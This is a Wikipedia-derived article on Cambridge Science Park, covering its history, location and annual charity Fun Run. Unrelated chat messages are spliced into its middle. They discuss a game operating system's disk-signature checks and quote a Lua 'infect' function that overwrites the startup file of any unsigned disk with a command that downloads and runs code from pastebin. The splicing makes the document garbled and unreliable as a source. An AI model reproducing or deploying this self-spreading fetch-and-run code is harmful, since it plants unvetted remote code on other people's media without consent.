Cambridge Science Park

The Cambridge Science Park, founded by Trinity College in 1970,[2] is the oldest science park in the United Kingdom. It is a concentration of science and technology related businesses, and has strong links with the nearby University of Cambridge.


Cambridge Science Park
The main entrance to Cambridge Science Park
LocationMilton, Cambridge
AddressMilton Road
Coordinates52°14′2″N 0°8′40″E
Opening dateAutumn 1973[1]
DeveloperBidwells[1]
ManagerJeanette Walker[1]
OwnerTrinity College, Cambridge, Trinity Hall, Cambridge[1]
No. of tenants90[1]
Size173 acres[1]
Websitewww.cambridgesciencepark.co.uk

The science park is situated about 3 km to the north of Cambridge city centre, by junction 33 of the A14, in the parish of Milton, contiguous with Cambridge itself. The park is served by Cambridge North railway station and by the Cambridgeshire Guided Busway, and will also have a light railway station at its northern entrance for the planned Cambridge Autonomous Metro. It is directly adjacent to St John's Innovation Centre and Cambridge Business Park.[3]

History

The land was originally given to Trinity College when the latter was founded by Henry VIII in 1546. The land was used for farming until the Second World War, when it was requisitioned by the US Army and used to prepare vehicles and tanks for D-Day. After the war, the land was left derelict until 1970, when, at the suggestion of Tony Cornell,[4] and under the supervision of Sir John Bradfield, the college worked with Sir Francis Pemberton of Bidwells[5] to develop it into a new centre for scientific enterprise and innovation.

In 2017, following decades of rapid expansion in Cambridge, the park appointed its first director and announced a large investment intended to improve facilities and reduce traffic congestion.[1]

Notable companies

Bio-medical

Computer/telecoms

Industrial technology

Other

Cambridge Fun Run

The Cambridge Fun Run is a charity race for Children in Need organised and mainly entered by employees of businesses based in and around the Science Park. It has been held each November since 1989. Contestants compete in teams of four, some in fancy dress, running either one lap (as a group) or four laps (as a relay) of the 1.8 km (1.1 mi) Science Park ring road. The race begins and ends, and medals and trophies are awarded (for fastest runners and best costumes) in front of the Cambridge Consultants building.[6][7]

gollark: If you have the private key, you can generate signatures for any startup. You don't, though. The stuff written onto disks *also* has a UUID embedded (on the more complex ones), which is part of the signed bit.
gollark: The signatures are programatically generated from the contents of the file and my private key. PotatOS has the *public* key, so it can verify that the signature was generated from the corresponding private key.
gollark: Um, no, that's not how it works.
gollark: Quick summary:- valid disks contain a signature file and a startup- the signature can be in the old table format or hexadecimal- only disks where the signature is valid for the code on them are executed
gollark: The relevant code:```lualocal function infect(disk_side) local mp = disk.getMountPath(disk_side) if not mp then return end local ds = fs.combine(mp, "startup") -- Find paths to startup and signature files local disk_ID = disk.getID(disk_side) local sig_file = fs.combine(mp, "signature") -- shell.run disks marked with the Brand of PotatOS -- except not actually, it's cool and uses load now if fs.exists(ds) and fs.exists(sig_file) then local code = fread(ds) local sig_raw = fread(sig_file) local sig if sig_raw:find "{" then sig = textutils.unserialise(sig_raw) else sig = unhexize(sig_raw) end disk.eject(disk_side) if verify(code, sig) then -- run code, but safely (via pcall) -- print output for debugging print "Signature Valid; PotatOS Disk Loading" local out, err = load(code, "@disk/startup", nil, external_env) if not out then printError(err) else local ok, res = pcall(out, { side = disk_side, mount_path = mp, ID = disk_ID }) if ok then print(textutils.serialise(res)) else printError(res) end end else printError "Invalid Signature!" printError "Initiating Procedure 5." end -- if they're not PotatOS'd, write it on else fwrite(ds, "shell.run 'pastebin run RM13UGFa update' -- PotatOS") endend```

See also

Notes

  1. "'We want to inject more soul into the Science Park', says inaugural director". 3 September 2017. Retrieved 27 January 2018.
  2. #BPGCSE
  3. Cambridge Metro
  4. "Ghostbuster who had the spirit to persevere". Cambridge Evening News. 16 April 2010. Archived from the original on 22 March 2012. Retrieved 24 April 2010.
  5. "'Great man' Sir Francis dies at 95". Cambridge Evening News. 6 November 2011. Archived from the original on 1 February 2014. Retrieved 21 January 2014.
  6. Cambridge Fun Run in aid of Children in Need Archived 21 November 2011 at the Wayback Machine
  7. GALLERY: 600 workers pass the baton for Children in Need Archived 20 November 2011 at the Wayback Machine

References

  • Bowen, Ann; Pallister, John (2002). Understanding GCSE Geography. Heinemann Educational. p. 182.
This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.